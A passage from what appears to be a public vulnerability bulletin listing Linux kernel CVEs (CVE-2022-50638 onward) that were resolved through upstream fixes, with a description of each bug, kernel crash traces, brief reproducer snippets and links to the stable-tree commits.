this case, run the `cat` command to view inode<12>. And Bug_ON is triggered due to the incorrect extents. When the boot loader inode is not initialized, its imode can be one of the following: 1) the imode is a bad type, which is marked as bad_inode in ext4_iget and set to S_IFREG. 2) the imode is good type but not S_IFREG. 3) the imode is S_IFREG. The BUG_ON may be triggered by bypassing the check in cases 1 and 2. Therefore, when the boot loader inode is bad_inode or its imode is not S_IFREG, initialize the inode to avoid triggering the BUG. | 2025-12-09 | not yet calculated | CVE-2022-50638 | https://git.kernel.org/stable/c/e76ede9d2c9e0af4573342b56d7cdbf757c18084 https://git.kernel.org/stable/c/a95ba369255ddcdc5e43d38bc5203537bdf3a518 https://git.kernel.org/stable/c/5f8d36abd2059bf1bd016b17d1fe78d8613deddd https://git.kernel.org/stable/c/78e335fb573e6a85718c4c24d5a052718a99a9ed https://git.kernel.org/stable/c/71e99ec1315fe98d322b17b9a28f204aaf15ffee https://git.kernel.org/stable/c/d480a49c15c465cb9a16db1379f4996e9b5bb9cc https://git.kernel.org/stable/c/feec0ea94c5ef4aa118750284c8a921698733ef2 https://git.kernel.org/stable/c/a125c8806b7d3c3815b6f9f59d395b9d7527b0ef https://git.kernel.org/stable/c/991ed014de0840c5dc405b679168924afb2952ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io-wq: Fix memory leak in worker creation If the CPU mask allocation for a node fails, then the memory allocated for the 'io_wqe' struct of the current node doesn't get freed on the error handling path, since it has not yet been added to the 'wqes' array. This was spotted when fuzzing v6.1-rc1 with Syzkaller: BUG: memory leak unreferenced object 0xffff8880093d5000 (size 1024): comm "syz-executor.2", pid 7701, jiffies 4295048595 (age 13.900s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000cb463369>] __kmem_cache_alloc_node+0x18e/0x720 [<00000000147a3f9c>] kmalloc_node_trace+0x2a/0x130 [<000000004e107011>] io_wq_create+0x7b9/0xdc0 [<00000000c38b2018>] io_uring_alloc_task_context+0x31e/0x59d [<00000000867399da>] __io_uring_add_tctx_node.cold+0x19/0x1ba [<000000007e0e7a79>] io_uring_setup.cold+0x1b80/0x1dce [<00000000b545e9f6>] __x64_sys_io_uring_setup+0x5d/0x80 [<000000008a8a7508>] do_syscall_64+0x5d/0x90 [<000000004ac08bec>] entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-09 | not yet calculated | CVE-2022-50639 | https://git.kernel.org/stable/c/b6e2c54be37d5eb4f6666e6aa59cd0581c7ffc3c https://git.kernel.org/stable/c/ed981911a7c90a604f4a2bee908ab07e3b786aca https://git.kernel.org/stable/c/996d3efeb091c503afd3ee6b5e20eabf446fd955 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: core: Fix kernel panic when remove non-standard SDIO card SDIO tuple is only allocated for standard SDIO card, especially it causes memory corruption issues when the non-standard SDIO card has removed, which is because the card device's reference counter does not increase for it at sdio_init_func(), but all SDIO card device reference counter gets decreased at sdio_release_func(). | 2025-12-09 | not yet calculated | CVE-2022-50640 | https://git.kernel.org/stable/c/b8b2965932e702b21e335ff30e1bb550f5a23b6f https://git.kernel.org/stable/c/b3275dde570b6420106a715bb58a0af041b94d95 https://git.kernel.org/stable/c/1fb79478695d92bab1c120ad3dad05252b02a29d https://git.kernel.org/stable/c/7a09c64b7da0abdec3919812e3d93ecc44069ed0 https://git.kernel.org/stable/c/8bf037279b5869ae9331c42bb1527d2680ebba96 https://git.kernel.org/stable/c/1e8cd93ae536581562bab4e1d8c5315bbc2548bf https://git.kernel.org/stable/c/66d461a92f32b6995b630625d350259b6b1f961b https://git.kernel.org/stable/c/9972e6b404884adae9eec7463e30d9b3c9a70b18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HSI: omap_ssi: Fix refcount leak in ssi_probe When returning or breaking early from a for_each_available_child_of_node() loop, we need to explicitly call of_node_put() on the child node to possibly release the node. | 2025-12-09 | not yet calculated | CVE-2022-50641 | https://git.kernel.org/stable/c/20fbaff6699ea5553c67550e867d6f90b7085447 https://git.kernel.org/stable/c/18e199a5541aad6dc5cf51bc3f712247b2d17894 https://git.kernel.org/stable/c/e8a218c17d7c5c42d5609ef92d339b47f3d11d02 https://git.kernel.org/stable/c/aa9c0598b10960ad1198044da1e277a89b4e3af6 https://git.kernel.org/stable/c/962f22e7f7698f7718d95bd9b63e41fb8cca01a9 https://git.kernel.org/stable/c/691f23a8475f04c988f7e98066b084e996b40fa0 https://git.kernel.org/stable/c/e25f56f8bdf66126a54b5a88bc021c82bfb50b75 https://git.kernel.org/stable/c/0eff9ef67d91e350d2047c3e13b6c3b7d0c90bf4 https://git.kernel.org/stable/c/9a2ea132df860177b33c9fd421b26c4e9a0a9396 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_typec: zero out stale pointers `cros_typec_get_switch_handles` allocates four pointers when obtaining type-c switch handles. These pointers are all freed if failing to obtain any of them; therefore, pointers in `port` become stale. The stale pointers eventually cause use-after-free or double free in later code paths. Zeroing out all pointer fields after freeing to eliminate these stale pointers. | 2025-12-09 | not yet calculated | CVE-2022-50642 | https://git.kernel.org/stable/c/0ceadb5a3e45f1b81cf54bd496b40a5e50b6bd40 https://git.kernel.org/stable/c/b610758bb3e0674644c1255cdafc2f46b7e05ff9 https://git.kernel.org/stable/c/6613f36a2fa5c69e528bccba8b3d831f759dad2f https://git.kernel.org/stable/c/9a8aadcf0b459c1257b9477fd6402e1d5952ae07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix xid leak in cifs_copy_file_range() If the file is used by swap, before return -EOPNOTSUPP, should free the xid, otherwise, the xid will be leaked. | 2025-12-09 | not yet calculated | CVE-2022-50643 | https://git.kernel.org/stable/c/bf49d4fe4ab7b8d812927a2c7b514864d5fc1bb2 https://git.kernel.org/stable/c/27cfd3afaab000a455194338db3b7f2031fde9d0 https://git.kernel.org/stable/c/dc283313d1ca378d787cb55c1e580dc3de852680 https://git.kernel.org/stable/c/9a97df404a402fe1174d2d1119f87ff2a0ca2fe9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: ti: dra7-atl: Fix reference leak in of_dra7_atl_clk_probe pm_runtime_get_sync() will increment pm usage counter. Forgetting to putting operation will result in reference leak. Add missing pm_runtime_put_sync in some error paths. | 2025-12-09 | not yet calculated | CVE-2022-50644 | https://git.kernel.org/stable/c/27abe45df1dc394c184688d816cbbf2f194d4c6a https://git.kernel.org/stable/c/d84f77ef7d57658d7346f8c4797a570aa5e35fa6 https://git.kernel.org/stable/c/25fe7b0d596b343e7a5504ba11767115fff8494f https://git.kernel.org/stable/c/fc39ebf85d0349366b807fe2be848041c8523f03 https://git.kernel.org/stable/c/6d01017247eee3fba399f601b0bcb38e4fb88a72 https://git.kernel.org/stable/c/3441076f83aace85f5d6ccd9ffb301ac6b874776 https://git.kernel.org/stable/c/a9f69663ad571cbd7814dde38e3fcb4876341ed6 https://git.kernel.org/stable/c/c01ae99a4e3a0cdf70f7cd758a60a2243eac562c https://git.kernel.org/stable/c/9c59a01caba26ec06fefd6ca1f22d5fd1de57d63 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/i10nm: fix refcount leak in pci_get_dev_wrapper() As the comment of pci_get_domain_bus_and_slot() says, it returns a PCI device with refcount incremented, so it doesn't need to call an extra pci_dev_get() in pci_get_dev_wrapper(), and the PCI device needs to be put in the error path. | 2025-12-09 | not yet calculated | CVE-2022-50645 | https://git.kernel.org/stable/c/e6e295a434d1c917a017980389aec88bf35cc81b https://git.kernel.org/stable/c/2db53c7059167b63cc790366ef1a9e286e71980b https://git.kernel.org/stable/c/3e255dc21031cc1f341584eb99a7f31598bf0be7 https://git.kernel.org/stable/c/1adb2583cdbd75f379e3230a43a7412d373d499f https://git.kernel.org/stable/c/f29c2f57cdf7a57223dcd9fbaa2261faab5234b2 https://git.kernel.org/stable/c/9c8921555907f4d723f01ed2d859b66f2d14f08e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: hpsa: Fix possible memory leak in hpsa_init_one() The hpda_alloc_ctlr_info() allocates h and its field reply_map. However, in hpsa_init_one(), if alloc_percpu() failed, the hpsa_init_one() jumps to clean1 directly, which frees h and leaks the h->reply_map. Fix by calling hpda_free_ctlr_info() to release h->replay_map and h instead free h directly. | 2025-12-09 | not yet calculated | CVE-2022-50646 | https://git.kernel.org/stable/c/f4d1c14e8b404766ff2bb8644bb19443d73965de https://git.kernel.org/stable/c/f8fc2f18652917cdcc89cb23f3a1b7cb6e119c5e https://git.kernel.org/stable/c/c808edbf580bfc454671cbe66e9d7c2e938e7601 https://git.kernel.org/stable/c/bfe10a1d9fbccdf39f8449d62509f070d8aaaac1 https://git.kernel.org/stable/c/fc998d0a7d65672f0812f11cd0ec4bbe4f8f8507 https://git.kernel.org/stable/c/0aa7be66168b1e84b2581ffff3ccb54a6c804a1e https://git.kernel.org/stable/c/9c9ff300e0de07475796495d86f449340d454a0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: Make port I/O string accessors actually work Fix port I/O string accessors such as `insb', `outsb', etc. which use the physical PCI port I/O address rather than the corresponding memory mapping to get at the requested location, which in turn breaks at least accesses made by our parport driver to a PCIe parallel port such as: PCI parallel port detected: 1415:c118, I/O at 0x1000(0x1008), IRQ 20 parport0: PC-style at 0x1000 (0x1008), irq 20, using FIFO [PCSPP,TRISTATE,COMPAT,EPP,ECP] causing a memory access fault: Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000001008 Oops [#1] Modules linked in: CPU: 1 PID: 350 Comm: cat Not tainted 6.0.0-rc2-00283-g10d4879f9ef0-dirty #23 Hardware name: SiFive HiFive Unmatched A00 (DT) epc : parport_pc_fifo_write_block_pio+0x266/0x416 ra : parport_pc_fifo_write_block_pio+0xb4/0x416 epc : ffffffff80542c3e ra : ffffffff80542a8c sp : ffffffd88899fc60 gp : ffffffff80fa2700 tp : ffffffd882b1e900 t0 : ffffffd883d0b000 t1 : ffffffffff000002 t2 : 4646393043330a38 s0 : ffffffd88899fcf0 s1 : 0000000000001000 a0 : 0000000000000010 a1 : 0000000000000000 a2 : ffffffd883d0a010 a3 : 0000000000000023 a4 : 00000000ffff8fbb a5 : ffffffd883d0a001 a6 : 0000000100000000 a7 : ffffffc800000000 s2 : ffffffffff000002 s3 : ffffffff80d28880 s4 : ffffffff80fa1f50 s5 : 0000000000001008 s6 : 0000000000000008 s7 : ffffffd883d0a000 s8 : 0004000000000000 s9 : ffffffff80dc1d80 s10: ffffffd8807e4000 s11: 0000000000000000 t3 : 00000000000000ff t4 : 393044410a303930 t5 : 0000000000001000 t6 : 0000000000040000 status: 0000000200000120 badaddr: 0000000000001008 cause: 000000000000000f [<ffffffff80543212>] parport_pc_compat_write_block_pio+0xfe/0x200 [<ffffffff8053bbc0>] parport_write+0x46/0xf8 [<ffffffff8050530e>] lp_write+0x158/0x2d2 [<ffffffff80185716>] vfs_write+0x8e/0x2c2 [<ffffffff80185a74>] ksys_write+0x52/0xc2 [<ffffffff80185af2>] sys_write+0xe/0x16 [<ffffffff80003770>] ret_from_syscall+0x0/0x2 ---[ end trace 0000000000000000 ]--- For simplicity address the problem by adding PCI_IOBASE to the physical address requested in the respective wrapper macros only, observing that the raw accessors such as `__insb', `__outsb', etc. are not supposed to be used other than by said macros. Remove the cast to `long' that is no longer needed on `addr' now that it is used as an offset from PCI_IOBASE and add parentheses around `addr' needed for predictable evaluation in macro expansion. No need to make said adjustments in separate changes given that current code is gravely broken and does not ever work. | 2025-12-09 | not yet calculated | CVE-2022-50647 | https://git.kernel.org/stable/c/2c60db6869fe5213471fcf4fe5704dc29da8b5ee https://git.kernel.org/stable/c/2ce9fab94b8db61f014e43ddf80dd1524ae6dff4 https://git.kernel.org/stable/c/dc235db7b79a352d07d62e8757ad856dbf1564c1 https://git.kernel.org/stable/c/140b2b92dbefffa7f4f7211a1fd399a6e79e71c4 https://git.kernel.org/stable/c/1acee4616930fc07265cb8e539753a8062daa8e0 https://git.kernel.org/stable/c/9cc205e3c17d5716da7ebb7fa0c985555e95d009 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix recursive locking direct_mutex in ftrace_modify_direct_caller Naveen reported recursive locking of direct_mutex with sample ftrace-direct-modify.ko: [ 74.762406] WARNING: possible recursive locking detected [ 74.762887] 6.0.0-rc6+ #33 Not tainted [ 74.763216] -------------------------------------------- [ 74.763672] event-sample-fn/1084 is trying to acquire lock: [ 74.764152] ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ register_ftrace_function+0x1f/0x180 [ 74.764922] [ 74.764922] but task is already holding lock: [ 74.765421] ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ modify_ftrace_direct+0x34/0x1f0 [ 74.766142] [ 74.766142] other info that might help us debug this: [ 74.766701] Possible unsafe locking scenario: [ 74.766701] [ 74.767216] CPU0 [ 74.767437] ---- [ 74.767656] lock(direct_mutex); [ 74.767952] lock(direct_mutex); [ 74.768245] [ 74.768245] *** DEADLOCK *** [ 74.768245] [ 74.768750] May be due to missing lock nesting notation [ 74.768750] [ 74.769332] 1 lock held by event-sample-fn/1084: [ 74.769731] #0: ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ modify_ftrace_direct+0x34/0x1f0 [ 74.770496] [ 74.770496] stack backtrace: [ 74.770884] CPU: 4 PID: 1084 Comm: event-sample-fn Not tainted ... [ 74.771498] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), ... [ 74.772474] Call Trace: [ 74.772696] <TASK> [ 74.772896] dump_stack_lvl+0x44/0x5b [ 74.773223] __lock_acquire.cold.74+0xac/0x2b7 [ 74.773616] lock_acquire+0xd2/0x310 [ 74.773936] ? register_ftrace_function+0x1f/0x180 [ 74.774357] ? lock_is_held_type+0xd8/0x130 [ 74.774744] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.775213] __mutex_lock+0x99/0x1010 [ 74.775536] ? register_ftrace_function+0x1f/0x180 [ 74.775954] ? slab_free_freelist_hook.isra.43+0x115/0x160 [ 74.776424] ? ftrace_set_hash+0x195/0x220 [ 74.776779] ? register_ftrace_function+0x1f/0x180 [ 74.777194] ? kfree+0x3e1/0x440 [ 74.777482] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.777941] ? __schedule+0xb40/0xb40 [ 74.778258] ? register_ftrace_function+0x1f/0x180 [ 74.778672] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.779128] register_ftrace_function+0x1f/0x180 [ 74.779527] ? ftrace_set_filter_ip+0x33/0x70 [ 74.779910] ? __schedule+0xb40/0xb40 [ 74.780231] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.780678] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.781147] ftrace_modify_direct_caller+0x5b/0x90 [ 74.781563] ? 0xffffffffa0201000 [ 74.781859] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.782309] modify_ftrace_direct+0x1b2/0x1f0 [ 74.782690] ? __schedule+0xb40/0xb40 [ 74.783014] ? simple_thread+0x2a/0xb0 [ftrace_direct_modify] [ 74.783508] ? __schedule+0xb40/0xb40 [ 74.783832] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.784294] simple_thread+0x76/0xb0 [ftrace_direct_modify] [ 74.784766] kthread+0xf5/0x120 [ 74.785052] ? kthread_complete_and_exit+0x20/0x20 [ 74.785464] ret_from_fork+0x22/0x30 [ 74.785781] </TASK> Fix this by using register_ftrace_function_nolock in ftrace_modify_direct_caller. | 2025-12-09 | not yet calculated | CVE-2022-50648 | https://git.kernel.org/stable/c/2482eacb685b6500e158268befbe6c90de5f166a https://git.kernel.org/stable/c/9d2ce78ddcee159eb6a97449e9c68b6d60b9cec4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: adp5061: fix out-of-bounds read in adp5061_get_chg_type() ADP5061_CHG_STATUS_1_CHG_STATUS is masked with 0x07, which means a length of 8, but adp5061_chg_type array size is 4, may end up reading 4 elements beyond the end of the adp5061_chg_type[] array. | 2025-12-09 | not yet calculated | CVE-2022-50649 | https://git.kernel.org/stable/c/24a0be36e9a21f63de2e6088607e689e59ec15f4 https://git.kernel.org/stable/c/3376a0cf138dfc90b449fde541ca228a33e1c143 https://git.kernel.org/stable/c/89f305a71418591cdda18180f712f91c9820f03b https://git.kernel.org/stable/c/7c8bc374659de19d846f7cab3eda9ebdb005c4cc https://git.kernel.org/stable/c/038e4aa71281d0cbc8aeb56ba05ff7fc5653a106 https://git.kernel.org/stable/c/dc52b73d3acd676ccbb440fcec617c547b903af2 https://git.kernel.org/stable/c/9d47e01b9d807808224347935562f7043a358054 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix reference state management for synchronous callbacks Currently, verifier verifies callback functions (sync and async) as if they will be executed once, (i.e. it explores execution state as if the function was being called once). The next insn to explore is set to start of subprog and the exit from nested frame is handled using curframe > 0 and prepare_func_exit. In case of async callback it uses a customized variant of push_stack simulating a kind of branch to set up custom state and execution context for the async callback. While this approach is simple and works when callback really will be executed only once, it is unsafe for all of our current helpers which are for_each style, i.e. they execute the callback multiple times. A callback releasing acquired references of the caller may do so multiple times, but currently verifier sees it as one call inside the frame, which then returns to caller. Hence, it thinks it released some reference that the cb e.g. got access through callback_ctx (register filled inside cb from spilled typed register on stack). Similarly, it may see that an acquire call is unpaired inside the callback, so the caller will copy the reference state of callback and then will have to release the register with new ref_obj_ids. But again, the callback may execute multiple times, but the verifier will only account for acquired references for a single symbolic execution of the callback, which will cause leaks. Note that for async callback case, things are different. While currently we have bpf_timer_set_callback which only executes it once, even for multiple executions it would be safe, as reference state is NULL and check_reference_leak would force program to release state before BPF_EXIT. The state is also unaffected by analysis for the caller frame. Hence async callback is safe. Since we want the reference state to be accessible, e.g. for pointers loaded from stack through callback_ctx's PTR_TO_STACK, we still have to copy caller's reference_state to callback's bpf_func_state, but we enforce that whatever references it adds to that reference_state has been released before it hits BPF_EXIT. This requires introducing a new callback_ref member in the reference state to distinguish between caller vs callee references. Hence, check_reference_leak now errors out if it sees we are in callback_fn and we have not released callback_ref refs. Since there can be multiple nested callbacks, like frame 0 -> cb1 -> cb2 etc. we need to also distinguish between whether this particular ref belongs to this callback frame or parent, and only error for our own, so we store state->frameno (which is always non-zero for callbacks). In short, callbacks can read parent reference_state, but cannot mutate it, to be able to use pointers acquired by the caller. They must only undo their changes (by releasing their own acquired_refs before BPF_EXIT) on top of caller reference_state before returning (at which point the caller and callback state will match anyway, so no need to copy it back to caller). | 2025-12-09 | not yet calculated | CVE-2022-50650 | https://git.kernel.org/stable/c/4ed5155043c97ac8912bcf67331df87c833fb067 https://git.kernel.org/stable/c/caa176c0953cdfd5ce500fb517ce1ea924a8bc4c https://git.kernel.org/stable/c/aed931fd3b6e28f19cc140ff90aa5046ee2aa4e1 https://git.kernel.org/stable/c/9d9d00ac29d0ef7ce426964de46fa6b380357d0a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: eeprom: fix null-deref on genl_info in dump The similar fix as commit 46cdedf2a0fa ("ethtool: pse-pd: fix null-deref on genl_info in dump") is also needed for ethtool eeprom. | 2025-12-09 | not yet calculated | CVE-2022-50651 | https://git.kernel.org/stable/c/138a13d8f5c81266032af680f63069387f2748da https://git.kernel.org/stable/c/1e3be98592a12511d4e78a9a67aaff3e6ca4980c https://git.kernel.org/stable/c/9d9effca9d7d7cf6341182a7c5cabcbd6fa28063 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: uio: uio_dmem_genirq: Fix missing unlock in irq configuration Commit b74351287d4b ("uio: fix a sleep-in-atomic-context bug in uio_dmem_genirq_irqcontrol()") started calling disable_irq() without holding the spinlock because it can sleep. However, that fix introduced another bug: if interrupt is already disabled and a new disable request comes in, then the spinlock is not unlocked: root@localhost:~# printf '\x00\x00\x00\x00' > /dev/uio0 root@localhost:~# printf '\x00\x00\x00\x00' > /dev/uio0 root@localhost:~# [ 14.851538] BUG: scheduling while atomic: bash/223/0x00000002 [ 14.851991] Modules linked in: uio_dmem_genirq uio myfpga(OE) bochs drm_vram_helper drm_ttm_helper ttm drm_kms_helper drm snd_pcm ppdev joydev psmouse snd_timer snd e1000fb_sys_fops syscopyarea parport sysfillrect soundcore sysimgblt input_leds pcspkr i2c_piix4 serio_raw floppy evbug qemu_fw_cfg mac_hid pata_acpi ip_tables x_tables autofs4 [last unloaded: parport_pc] [ 14.854206] CPU: 0 PID: 223 Comm: bash Tainted: G OE 6.0.0-rc7 #21 [ 14.854786] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 14.855664] Call Trace: [ 14.855861] <TASK> [ 14.856025] dump_stack_lvl+0x4d/0x67 [ 14.856325] dump_stack+0x14/0x1a [ 14.856583] __schedule_bug.cold+0x4b/0x5c [ 14.856915] __schedule+0xe81/0x13d0 [ 14.857199] ? idr_find+0x13/0x20 [ 14.857456] ? get_work_pool+0x2d/0x50 [ 14.857756] ? __flush_work+0x233/0x280 [ 14.858068] ? __schedule+0xa95/0x13d0 [ 14.858307] ? idr_find+0x13/0x20 [ 14.858519] ? get_work_pool+0x2d/0x50 [ 14.858798] schedule+0x6c/0x100 [ 14.859009] schedule_hrtimeout_range_clock+0xff/0x110 [ 14.859335] ? tty_write_room+0x1f/0x30 [ 14.859598] ? n_tty_poll+0x1ec/0x220 [ 14.859830] ? tty_ldisc_deref+0x1a/0x20 [ 14.860090] schedule_hrtimeout_range+0x17/0x20 [ 14.860373] do_select+0x596/0x840 [ 14.860627] ? __kernel_text_address+0x16/0x50 [ 14.860954] ? poll_freewait+0xb0/0xb0 [ 14.861235] ? poll_freewait+0xb0/0xb0 [ 14.861517] ? rpm_resume+0x49d/0x780 [ 14.861798] ? common_interrupt+0x59/0xa0 [ 14.862127] ? asm_common_interrupt+0x2b/0x40 [ 14.862511] ? __uart_start.isra.0+0x61/0x70 [ 14.862902] ? __check_object_size+0x61/0x280 [ 14.863255] core_sys_select+0x1c6/0x400 [ 14.863575] ? vfs_write+0x1c9/0x3d0 [ 14.863853] ? vfs_write+0x1c9/0x3d0 [ 14.864121] ? _copy_from_user+0x45/0x70 [ 14.864526] do_pselect.constprop.0+0xb3/0xf0 [ 14.864893] ? do_syscall_64+0x6d/0x90 [ 14.865228] ? do_syscall_64+0x6d/0x90 [ 14.865556] __x64_sys_pselect6+0x76/0xa0 [ 14.865906] do_syscall_64+0x60/0x90 [ 14.866214] ? syscall_exit_to_user_mode+0x2a/0x50 [ 14.866640] ? do_syscall_64+0x6d/0x90 [ 14.866972] ? do_syscall_64+0x6d/0x90 [ 14.867286] ? do_syscall_64+0x6d/0x90 [ 14.867626] entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] stripped [ 14.872959] </TASK> ('myfpga' is a simple 'uio_dmem_genirq' driver I wrote to test this) The implementation of "uio_dmem_genirq" was based on "uio_pdrv_genirq" and it is used in a similar manner to the "uio_pdrv_genirq" driver with respect to interrupt configuration and handling. At the time "uio_dmem_genirq" was introduced, both had the same implementation of the 'uio_info' handlers irqcontrol() and handler(). Then commit 34cb27528398 ("UIO: Fix concurrency issue"), which was only applied to "uio_pdrv_genirq", ended up making them a little different. That commit, among other things, changed disable_irq() to disable_irq_nosync() in the implementation of irqcontrol(). The motivation there was to avoid a deadlock between irqcontrol() and handler(), since it added a spinlock in the irq handler, and disable_irq() waits for the completion of the irq handler. By changing disable_irq() to disable_irq_nosync() in irqcontrol(), we also avoid the sleeping-whil ---truncated--- | 2025-12-09 | not yet calculated | CVE-2022-50652 | https://git.kernel.org/stable/c/9977cb7af5a8f4738198b020436e2e56c5cd721e https://git.kernel.org/stable/c/a323d24a0183be730d2398b11b3a91e5c2e222a0 https://git.kernel.org/stable/c/ac5585bb06a2e82177269bee93e59887ce591106 https://git.kernel.org/stable/c/eca77a25a7cb3201738f4b55b9b8fa1089d7d002 https://git.kernel.org/stable/c/9bf7a0b2b15cd12e15f7858072bd89933746de67 https://git.kernel.org/stable/c/79a4bdb6b9920134af1a4738a1fa36a0438cd905 https://git.kernel.org/stable/c/030b6c7bb1e4edebaee2b1e48fbcc9cd5998d51d https://git.kernel.org/stable/c/ee180e867ce4b2f744799247b81050b3e5dd62cd https://git.kernel.org/stable/c/9de255c461d1b3f0242b3ad1450c3323a3e00b34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: atmel-mci: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, it will lead two issues: 1. The memory that allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete device, but it's not added yet, it will lead a kernel crash because of null-ptr-deref in device_del(). So fix this by checking the return value and calling mmc_free_host() in the error path. | 2025-12-09 | not yet calculated | CVE-2022-50653 | https://git.kernel.org/stable/c/99a6cdfa2cf05028b52f6d8ee85ccc5f8b71b4a2 https://git.kernel.org/stable/c/6bb26abb92f25e582a0976091a10b539fe3796db https://git.kernel.org/stable/c/00ac0f5f95920f003cd6ece53cdc759549b69118 https://git.kernel.org/stable/c/1925472dec31ec061d57412b3a65a056ea24f340 https://git.kernel.org/stable/c/cc8bb436f3c842a86b9082d97933582120d180e2 https://git.kernel.org/stable/c/85946ceb0fac20ab39cdb85333086daf0291a553 https://git.kernel.org/stable/c/9e6e8c43726673ca2abcaac87640b9215fd72f4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix panic due to wrong pageattr of im->image In the scenario where livepatch and kretfunc coexist, the pageattr of im->image is rox after arch_prepare_bpf_trampoline in bpf_trampoline_update, and then modify_fentry or register_fentry returns -EAGAIN from bpf_tramp_ftrace_ops_func, the BPF_TRAMP_F_ORIG_STACK flag will be configured, and arch_prepare_bpf_trampoline will be re-executed. At this time, because the pageattr of im->image is rox, arch_prepare_bpf_trampoline will read and write im->image, which causes a fault. as follows: insmod livepatch-sample.ko # samples/livepatch/livepatch-sample.c bpftrace -e 'kretfunc:cmdline_proc_show {}' BUG: unable to handle page fault for address: ffffffffa0206000 PGD 322d067 P4D 322d067 PUD 322e063 PMD 1297e067 PTE d428061 Oops: 0003 [#1] PREEMPT SMP PTI CPU: 2 PID: 270 Comm: bpftrace Tainted: G E K 6.1.0 #5 RIP: 0010:arch_prepare_bpf_trampoline+0xed/0x8c0 RSP: 0018:ffffc90001083ad8 EFLAGS: 00010202 RAX: ffffffffa0206000 RBX: 0000000000000020 RCX: 0000000000000000 RDX: ffffffffa0206001 RSI: ffffffffa0206000 RDI: 0000000000000030 RBP: ffffc90001083b70 R08: 0000000000000066 R09: ffff88800f51b400 R10: 000000002e72c6e5 R11: 00000000d0a15080 R12: ffff8880110a68c8 R13: 0000000000000000 R14: ffff88800f51b400 R15: ffffffff814fec10 FS: 00007f87bc0dc780(0000) GS:ffff88803e600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffffa0206000 CR3: 0000000010b70000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> bpf_trampoline_update+0x25a/0x6b0 __bpf_trampoline_link_prog+0x101/0x240 bpf_trampoline_link_prog+0x2d/0x50 bpf_tracing_prog_attach+0x24c/0x530 bpf_raw_tp_link_attach+0x73/0x1d0 __sys_bpf+0x100e/0x2570 __x64_sys_bpf+0x1c/0x30 do_syscall_64+0x5b/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd With this patch, when modify_fentry or register_fentry returns -EAGAIN from bpf_tramp_ftrace_ops_func, the pageattr of im->image will be reset to nx+rw. | 2025-12-09 | not yet calculated | CVE-2022-50654 | https://git.kernel.org/stable/c/d9d383cbf812a3b4094c089aa5f5d41a3bb4531d https://git.kernel.org/stable/c/7f656fff955ccb216c40fa188a24c05fa40985a5 https://git.kernel.org/stable/c/9ed1d9aeef5842ecacb660fce933613b58af1e00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ppp: associate skb with a device at tx Syzkaller triggered flow dissector warning with the following: r0 = openat$ppp(0xffffffffffffff9c, &(0x7f0000000000), 0xc0802, 0x0) ioctl$PPPIOCNEWUNIT(r0, 0xc004743e, &(0x7f00000000c0)) ioctl$PPPIOCSACTIVE(r0, 0x40107446, &(0x7f0000000240)={0x2, &(0x7f0000000180)=[{0x20, 0x0, 0x0, 0xfffff034}, {0x6}]}) pwritev(r0, &(0x7f0000000040)=[{&(0x7f0000000140)='\x00!', 0x2}], 0x1, 0x0, 0x0) [ 9.485814] WARNING: CPU: 3 PID: 329 at net/core/flow_dissector.c:1016 __skb_flow_dissect+0x1ee0/0x1fa0 [ 9.485929] skb_get_poff+0x53/0xa0 [ 9.485937] bpf_skb_get_pay_offset+0xe/0x20 [ 9.485944] ? ppp_send_frame+0xc2/0x5b0 [ 9.485949] ? _raw_spin_unlock_irqrestore+0x40/0x60 [ 9.485958] ? __ppp_xmit_process+0x7a/0xe0 [ 9.485968] ? ppp_xmit_process+0x5b/0xb0 [ 9.485974] ? ppp_write+0x12a/0x190 [ 9.485981] ? do_iter_write+0x18e/0x2d0 [ 9.485987] ? __import_iovec+0x30/0x130 [ 9.485997] ? do_pwritev+0x1b6/0x240 [ 9.486016] ? trace_hardirqs_on+0x47/0x50 [ 9.486023] ? 